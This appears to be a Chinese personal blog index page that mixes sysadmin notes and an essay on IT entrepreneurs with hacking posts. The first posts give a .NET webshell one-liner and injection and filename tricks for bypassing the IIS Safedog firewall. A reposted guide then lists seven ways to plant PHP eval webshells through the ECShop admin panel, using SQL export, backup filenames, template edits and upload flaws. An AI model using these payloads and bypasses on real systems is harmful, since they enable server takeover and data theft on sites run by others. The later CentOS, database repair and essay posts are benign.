预览模式: 普通 | 列表

突破安全狗的一些记录

1、绕过IIS安全狗的一句话。
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["t00ls"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
连接端用cncert的aspx一句话客户端。
 
2、IIS6.0解析漏洞遇到安全狗。
文件名为http://www.xxxx.com/1.asp;1.jpg。
这样的会被IIS安全狗果断屏蔽。
改成如下名称,IIS6一样会解析:
http://www.xxxx.com/;1.asp;1.jpg
 
3、安全狗的注入绕过。
常用的如seo.asp?id=1 and 1=1 是会被安全狗屏蔽的。
但如果:
seo.asp?seo.com=%00.&id=69%20 and 1=1就可以成功绕过了。 

 

分类:网络安全 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1410

 在尝试从本地安全性数据库(%windir%\security\database\secedit.sdb)中检索这些设置时返回的错误为:参数不正确。 

所有本地安全性设置都将被显示,但是不会指出一个给定的安全性设置是否由组策略定义。 
所有由此用户界面改动的本地安全性设置都可能随后被域级的策略覆盖。 

按照网上的办法如下: 
解决方案: 

1.
切换到命令提示符状态。 
2.
执行“esentutl /k %windir%\Security\Database\Secedit.sdb”“esentutl /g %windir%\Security\Database\Secedit.sdb”secedit.sdb进行检查。 
3.
手工备份要修复的数据库文件。 
4.
执行“esentutl /p %windir%\Security\Database\Secedit.sdb”进行修复,系统会弹出Warning提示框: 
"You should only run Repair on damaged or corrupted databases.Repair will not apply information in the transaction log files to the database,and may cause information to be lost.Do you wish to proceed?" 
单击OK,开始修复。 

执行后显示内容:
Microsoft(R) Windows(R) Database Utilities
Version 5.2
Copyright (C) Microsoft Corporation. All Rights Reserved.

Initiating REPAIR mode...
        Database: C:\WINDOWS\Security\Database\Secedit.sdb
  Temp. Database: TEMPREPAIR4884.EDB

Checking database integrity.

The database is not up-to-date. This operation may find that
this database is corrupt because data from the log files has
yet to be placed in the database.

To ensure the database is up-to-date please use the 'Recovery' operation.


                     Scanning Status (% complete)

          0    10   20   30   40   50   60   70   80   90  100
          |----|----|----|----|----|----|----|----|----|----|
          ...................................................


Integrity check successful.

Note:
  It is recommended that you immediately perform a full backup
  of this database. If you restore a backup made before the
  repair, the database will be rolled back to the state
  it was in at the time of that backup.

Operation completed successfully in 13.328 seconds.

分类:服务器 | 固定链接 | 评论: 38 | 引用: 0 | 查看次数: 1698
使用CentOS常用命令查看cpu

more /proc/cpuinfo | grep "model name"  
grep "model name" /proc/cpuinfo  
grep "model name" /proc/cpuinfo | cut -f2 -d:

查看更多...

分类:CentOS | 固定链接 | 评论: 524 | 引用: 0 | 查看次数: 8042

ecshop后台拿shell 个人总结七种方法

 最近想弄个ecshop做销售。装好ecshop V2.7.2版本之后,测试后台拿shell。

本人整理给自己看的,大家飘过就好。BY:黑猫

ecshop后台拿shell 个人总结七种方法

一、

系统==>数据库管理==>sql查询(可爆出物理路径):

==============创建表失败,导不出shell======================

show databases;
use 数据库名;
create a(cmd text not null);
insert into a(cmd) values(‘<?php eval($_POST[cmd]);?>’);
select cmd from a into outfile ‘导出路径’;
drop table if exists a;

==================创建表失败,导不出shell===================

二、

前台留个言,内容是我们的一句话木马:<?php eval($_POST[cmd]);?>

接着在后台系统==>数据库管理==>数据备份==>选择自定义备份,选择ecs_feedback这张表(存放留言的表)

备份文件名:x.php;.sql (x.php.sql形式出错,菜刀链接不成功)

然后菜刀链接成功

http://www.webshell.cc/data/sqldata/x.php;.sql

三、

1、添加会员,会员名称插入插入一句话 :<?php eval($_POST[cmd]);?> ,其他随便填写。
2、系统==>数据库管理==>数据备份—自定义备份—选“XXX_users”
(其中XXX因各站而异,是数据前缀)
3、备份文件名为mm.php;.sql
4、一句话客户端连接mm.php;.sql,地址一般为 http://www.webshell.cc/data/sqldata/mm.php;.sql

四、

模板管理==>库项目管理==>选择myship.lbi 配送方式。

在文件内容最后面加入一句话代码:<?php eval($_POST[cmd]);?>

菜刀链接http://www.webshell.cc/myship.php 成功。

说明:有些服务器过滤了eval 导致失败。

五、

http://www.webshell.cc/includes/fckeditor/editor/filemanager/connectors/test.html

代码省略
对Media 没有任何限制. 直接 Type=Media 上传 你的 解密webshell
访问路径为

http://www.webshell.cc/images/upload/Media/xxx.php

六、

上传txt 并且没有过滤任何函数.
于是运用到了php的文件操作…
<script language=”php”>$file = file_get_contents(“C:/Inetpub/wwwroot/ecshop/data/Article/1286344719152816497.txt”);
if($file){
$file = “C:/Inetpub/wwwroot/ecshop/data/Article/1286344719152816497.txt”;
$newfile = ‘C:/Inetpub/wwwroot/ecshop/data/distant.php;a.txt’;
copy($file,$newfile);
}</script>

将以上代码插入库项目管理中的myship.ini
打开http://www.webshell.cc/myship.php
即在http://www.webshell.cc/data/目录下生成distant.php;a.txt
菜刀连接之…搞定..

七、

进入后台-系统设置-Flash播放器管理- 直接上传x.php

ecshop V2.7.2 版本已经没有这个选项 ,所以这个已经失效。

转载来的文章,还不错,原作者博客地址
ecshop后台拿shell 个人总结七种方法:http://www.webshell.cc/1625.html
 
 
分类:网络安全 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1635
最近ipad经常会自动下载、安装一些莫名其妙的乱七八糟的软件,ipad是6.1系统,已越狱,印象中最近没有装过什么deb格式的程序。大家都知道,装ipa格式的软件是不会中毒不会出现这种问题的。

于是SSH连接到ipad,执行ps -e -f查看了进程。

进程较多,就不全部列出了。

查看更多...

分类:其它文章 | 固定链接 | 评论: 392 | 引用: 0 | 查看次数: 8084

ASP手工注入

扔掉工具 跟我一起学ASP手工注入!
现在的网络,脚本入侵十分的流行,而脚本注入漏洞更是风靡黑客界。不管是老鸟还是新起步的小菜,都会为它那巨大的威力和灵活多变的招式所着迷!
   正是因为注入攻击的流行,使的市面上的注入工具层出不穷!比较出名的有小竹的NBSI、教主的HDSI和啊D的注入工具等等!这大大方便的小菜们掌握注入 漏洞!可是,工具是死的,注入的手法却是活的,能否根据实际情况灵活地构造SQL注入语句,得到自己想要的信息,是[被屏蔽的不受欢迎关键词]高shou 与小菜的根本区别!只用工具,而不去管它的原理,是不可能得到提高的,当然,在遇到一些特殊情况的时候,那些只会用工具的小菜们也只能放弃了!所以学会手 工注入自己构造SQL注入语句是一个黑客爱好者必上的一堂课!我希望这篇文章能够给那些还不会手工注入的朋友一点启发!帮助大家早日摆脱工具,早日踏入 [被屏蔽的不受欢迎关键词]高shou的行列!
恶补基础:
   要想学会手工注入,有一个名词是不得不提的,那就是数据库系统!

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1506
经常听人Linux下设置某文件夹为777权限,777权限到底是什么意思呢?

首先要说明的是,777,其中第一个7是所属用户权限,第二个7是分组权限,第三个7代表其它用户权限

数字对应的权限如下:

查看更多...

分类:CentOS | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2563

互联网——降级论

 




  几乎一年没有写博客了,说没时间那是借口,唯一的原因是,年纪越大越发觉自己肤浅。有些想法还没提笔,就发现很幼稚,就不敢发出来贻笑大方了。这次先给大家说个小故事:


  从前有三个屌丝,聚在一起做网络,提供免费的网络服务,砸锅卖铁,通宵达旦,除了卖肾啥都做了。3年后终于做到了五百万用户,对于年轻人来说,能把五百万人玩弄于鼓掌之间,已经是很牛逼轰轰的事了。不过用户越多,成本越高,每年服务器、带宽租金、房租水电、广告运营等成本,已经达到了十七八万,屌丝们不得不面对一个终极问题:如何盈利?


  屌丝们定了三盘沙县水饺,围着一箱子的冰啤酒开始计算:按照最近一月的登陆情况来看,四百万个账号已经不活跃了,真正有商业价值的只有一百万人,如果开通 xx 功能,收点高级会员费,让其中 1% 的人升级为高级会员,每年付 30 块钱年费,那么每年收入就是 100 万 x 1% x 30 元 = 30 万元!不错嘛, 扣除十七八万的运营成本,还剩毛利润 12 万,每个屌丝年底能分到 4 万大洋,如果按照打工者的算法,这三个人每人月薪 3333 元,木有奖金,木有津贴、木有任何福利,上班还得带自家的电脑。


  尽管如此,屌丝们还是激动得咬了一口水饺:感谢苍天!我们终于要盈利啦!!!那一夜,人们看到三个发疯的屌丝在屋顶翩翩起舞。


  韩寒说,中国人民是最有忍耐力的族群,一点好处就感激涕零。他一定不知道,IT 创业界里的屌丝,才是这群傻逼中的战斗机。他们可以平静地忍受每年都持续亏钱,而且还能信心十足的对所有人说公司的状态非常好,如果有一天居然收支平衡了,他们会激动的趁夜难眠,比北朝鲜倒掉还开心。


  本文开头的三个屌丝,其实是非常幸运的,至少能做到月薪 3333 元。大部分的屌丝在第一年做到几万用户的时候就会挂掉,原因众多,最主要要的是意志太弱,受不了最初的寂寞;意志稍微坚强点的会在第二年第三年慢慢挂掉,原因主要是资金断裂、团队分裂;能成功熬到第四年还没饿死、还没被口水淹死、还没被肠胃病颈椎病腰肌劳损折磨死的,甚至员工不减反增的,基本上属于神仙级别了。


  我为什么要说三个屌丝的故事呢。首先是因为这是身边每天都在发生的故事,其次是因为感到可惜,IT 界在我眼里一直是一个无比高级的职业,聚集着全球最聪明、最富有的人类精英。以 IT 创业界的青年们的智商,他们可以做成任何一件事情,包括改造银行到制造汽车到发射航天飞机 。结果这帮人却整天在蓬头垢面得为 3k 的月薪而挣扎,太悲催了。


  为什么用悲催这个词? 如果一个人生下来就在山沟沟里,一辈子都没机会去见什么好东西,这不叫悲催,这只叫苦难;而如果一个人生出来有一个奇怪的特异功能:皮肤出来的汗水会凝结成昂贵的水晶,本来只靠出汗就能赚钱,结果这傻逼居然觉得出汗这个行为太低级,做手术把自己的汗腺全给切了,而且丝毫没有意识到他做了什么傻事,这才叫真的悲催。


  我们 IT 界中的很多人,生下来就是有这个出汗成水晶的特异功能的,正是因为这种与众不同,这群人能混入牛逼的大学,整天打网游还能写出像样的毕业论文, 拿到学位,进外企,考 CPA,做咨询、做证券分析,研究高分子材料,做电子商务,做云计算。。。一级一级的上升,直到有一天,发现身边的人里,已经没有一个不是 CPA,不是咨询师,不是高级研究员了,身边的人全是业界精英,个个都超级强悍。在这个所谓的高级圈子里,自己并没有任何过人之处,只不过是 just another analyst 而已。在高级圈子里拼的头破血流,最后也只能混到给台湾人整理数据而已。莫然回首,发现当年的血气方刚、年少时的无限梦想,进化成了一身肥胖的赘肉。这个时候,有个旁观者说:“升级到头了,该降级了”


  当一个社会疯狂鼓吹快节奏的时候,一定需要有人来宣扬慢生活;当全社会跟打了鸡血似的吹捧升级的时候,一定需要有人来说说降级论。


  IT 青年们喜欢打游戏,喜欢升级。他们的人生也和游戏一样,沉醉于不停的升级中,不仅喜欢升级自己手上的技术,把 MySQL 改成 MongoDB,把 Apache 升级为 Nginx,在 Mac 上装 Ubuntu,Ubuntu 里再装个虚拟机去跑 Mac OS。。。IT 青年们也喜欢升级自己的人生,从程序员升级到项目经理,再升级到技术总监或产品总监,再升级到合伙人。。。


  在不断追求升级的过程中,所面临的一个很大事实是:当一个人从 A 刚升级到 A+ 级的时候,其实这个人的能力层级依然只是A的层级,还未胜任 A+ 的层级,他必须要到 A+ 的后期,才可以胜任A+。就好像一个高中生,高考完之后,虽然理论上已经属于大学生了,但是他的实际能力依然只是高三毕业的水平,除非他全部 pass 了大一的期末考试。同样的道理,这个世界上有很多人的身份和称谓,都是在描述“未来的自己”,而不是现在的自己。当你从销售员升级为销售经理的时候,你自我感觉很好:“我现在是销售经理了”,但是这个时候 ,你并未通过公司对你作为销售经理这一年的工作成果的考核,你只是一个“未来可能是合格的销售经理”的前身。如果年终考核你失败了,那么这一年最准确的描述是:一个销售员,占了整整一年销售经理的位子,最后失败了。而且这一年一定会过的很累,因为通过考核的其他销售经理,才是真正胜任这个层级的人,跟一帮真正属于这个圈子的人厮杀,就好像拳击馆里当陪练的小角色,去和泰森比了一年的武,怎么可能不累呢?


  当我 2007 年进入互联网行业的时候,就是那个拳击馆里陪练的小角色,我被迫去跟全国各地的泰森比拼,结果累的半死。后来我开始反思最初的目标,为什么要在自己身上挂一个“拳击高手”的招牌,被那么多泰森追着打? 我把这块招牌卸了,找个完全没练武的人去比拼,不是更容易赢么?于是果断照做,去找了一个没人懂拳击的小乡村,做了纯英文的 Tucia.com ,只做国外的业务。在那个地方,作为一个知名武馆的拳击小陪练,我成了村子里拳击技术最高超的人,受人仰慕,还开武馆教人拳击,活的非常滋润,而且在教人拳击的过程中,自己的拳术也比以前提高了很多,发展出一套属于自己的拳法,我虽然进不了泰森们的大圈子,但他们也进不了我的小圈子。


  关于圈子,有一个很赤裸裸的现实:不会是你进入圈子,只能是圈子进入你。很多人会四处找关系,“帮我介绍给 xxx 吧,我想进入你们的圈子”,这样的人是永远进不去这个圈子的,因为圈子的天性是,永远追求更高一个层级的人。而我们的大部分人,其实都在以低一级的属性,占着更高一级的位子,徘徊在更高一级的圈子边缘,与更高一级的人竞争,幻想着自己可以升级到那个圈子里去。也许永远进不去,悲催的努力一辈子;也许运气好,某一天真的进入这个圈子了,但那个时候又会有下一个目标,希望进入更高级的圈子,这是一场没有终点的战斗。永远的追求升级,永远的累。


  有没有想过降级呢?


  如果一个来自微软的高级工程师,辞职去一个养猪场做开放平台经理,那么他的到来不仅会让养猪圈感到无比荣幸,更是意味着,利用他在 IT 界训练出来的高效工作方式和逻辑思维能力,他可以掀起一场养猪行业的革命,使得 20 年后才会出现的人性、高效、开放、协作、健康的养殖方式提前到达。在这场革命中,他会活的非常有价值。这种价值,在原先的圈子里,是完全体验不到的,因为他此前的所有工作,只是在满身疮痍的 Windows 系统上不停的打补丁,无论打多少都逃不开产品衰落、被人鄙视的命运。


  很多人的命运,都像是上面那个微软工程师。只需要降级,就能创造更大的价值,也能获得更大的满足。那为什么不呢?为什么要死死抱着那个所谓的“高级职业”不放呢?


  去年我曾犯贱去趟了移动互联网的浑水,做了个手机 app,刚开始的时候感觉很高级,但很快,铺天盖地的竞争对手就出现了,我又发现自己陷入了 2007 年一样的场景:作为一个小小陪练,我他妈的又被一帮泰森们给围住了。当泰森中的战斗机 —— 微信,变得无比牛逼之后,我就知道,战胜这群泰森是绝对不可能的事情了。于是我再次投靠了“降级论”,把自己从牛逼哄哄的移动互联网行业,降级到了一个被人不齿的低级项目:Tucia Baby。


  这个项目虽然是传统行业,但是我们基本上是按照互联网产品的思路去做的,除了拍摄需要来店里以外,其他一切,包括营销、预约、客服、后期、选片、取片、客户关系等,所有环节都放在网络上,尤其是微博(@tuciababy 官网)。当然,最重要的是,作为一个脑残的果粉,我按照 iPhone 的做工去要求每一张作品,必须达到我们能力可以做到的最好水准,不计成本的最好水准,才允许送给客户。正式接客不到两个月时间,虽然还远未达到成功,但目前已做到每天都有客户订单,财务上已实现盈利,未来相信一定会比大部分 app 开发者更光明。(ps:我们没有请公务员吃饭喝酒泡桑拿,也没有塞钱给任何政府机关。当你的产品真的用心做到很好的时候,其实你不需要讨好任何人的。)


  这个项目让我沉思了很久:2007 年我曾把一个纯纯的 web2.0 网站做到了 alexa 中国区前 1000 名(如有质疑,请查询 2010 年附近的 tucia.com 排名),结果一路亏损,到最后只剩下一个员工;2011 年我把那个纯纯的 app 做到苹果官方推荐免费榜第一位(如有质疑,请看点此看截图),那段时间每天四五千 iPhone 安装量,结果一路烧钱,到最后濒临关闭;而如今,我只需把自己从纯纯的互联网降级下来,做一些看起来有些“低级”的项目,居然就能立即实现收支平衡。


  除此以外,我还发现一个现象,中国消费者在与奸商们的长期斗争中,已经培养出了一种非常苦B的品质:只要不被坑,他就谢天谢地。如果商家严格做到了承诺的每一件事情,客户就会感动的泪如泉涌。如果商家不仅做到了所有承诺的事情,还很贴心的提供了一些额外的服务(比如我们给每位客户赠送非常好吃的樱桃和进口巧克力作为甜点),那么客户就会激动的哭天喊地、奔走相告,推荐给他认识的每一个人。


  其实这片肮脏的国土,就是上天赐予 IT 青年们的最好机会。


  在一个不会练武的村子里,只要你会打两拳,你就是拳术最厉害的人;在一个没有服务意识、忽视产品质量的土地上,只要你用心做服务,用最高的标准去要求自己,你就会成为这块土地上最出色的商家;在一个没有现代管理意识,不懂网络、不懂微博、不懂用户体验、不懂口碑传播的粗犷社会里,你只需要把之前花在 IT 产品上的心思的 10% 拿过来用,就可以秒杀一切天朝对手。


  所以,


  IT 青年们,当你在为网站的转化率苦苦思索的时候,当你在为 app 的活跃度辗转反侧的时候,当你在为融资计划苦苦哀求各界大佬引荐的时候,也许犯了一个错误,也许你们的脑子最值得闪光的地方,不是去悲催的 IT 界当炮灰,而应该是去按摩界、餐饮界、烧烤界、早餐界、理发界、送花界、纺织界、成人用品界、个人护理界、汽车修理界。。。与 IT 界相比,这些行业的确无比低级,他们的老板连 QQ 都会发音成“抠抠”,他们的员工一辈子都没用过 Email;跟他们解释什么是 SEO,什么是用户体验,什么是数据挖掘,他们会在听你说完之前就开枪自杀掉。正是因为如此,这些行业才是如此的不堪一击。正是因为如此,当智商高达 147 的 IT 青年还在为 3k 薪水拼命、而智商不到 50 的烧烤店老板正坐在 porsche 里玩着前面那位青年开发的 app 的时候,我就忍不住仰望星空。


 

分类:随手摘录 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1692

  1. 查看linux的内核版本,系统信息,常用的有三种办法:

     uname -a;   more /etc/issue;    cat /proc/version;

 2. 查看apache的版本信息,如果是通过yum,或者是rpm安装的,可以使用rpm -qa |gerp httpd 来查看;

还可以通过httpd -v来查询;

当然,安装好apache后,可以直接elink回环查看apache的信息。

3.查看php的版本信息,如果是通过yum,或者是rpm包安装的,可以使用rpm -qa |grep php来查看;

同样,也可以使用php -v来查看php的版本信息;

一般情况下,大多是通过安装lamp后,使用phpinfo的测试页来查看安装的php的信息;

4. 查看mysql的版本信息,如果是通过yum安装的,或者是rpm包安装的,可以使用rpm -qa |grep mysql 来查看;

 也可以使用mysql -v 或者是--help|grep Distrib来查看;

也可以进入mysql,然后通过命令select version();来查看;

或者是status;命令查看。

 个人觉得这些是比较常用的方法,当然肯定会有更加有效,更加便捷的办法和途径。

分类:CentOS | 固定链接 | 评论: 85 | 引用: 0 | 查看次数: 2303
今天我们在调试服务器的时候出现了一个错误,下面是错误的内容

Warning: session_start(): open(C:/Program Files/php/sessiontemp\sess_0cde28de3ce1a2e2cc8e8723b5a40279, O_RDWR) failed: Permission denied (13) in D:\home\400m\zmxxx\web\syssite\install\datainstall.php on line 7

Warning: Unknown(): open(C:/Program Files/php/sessiontemp\sess_0cde28de3ce1a2e2cc8e8723b5a40279, O_RDWR) failed: Permission denied (13) in Unknown on line 0

查看更多...

分类:PHP | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1725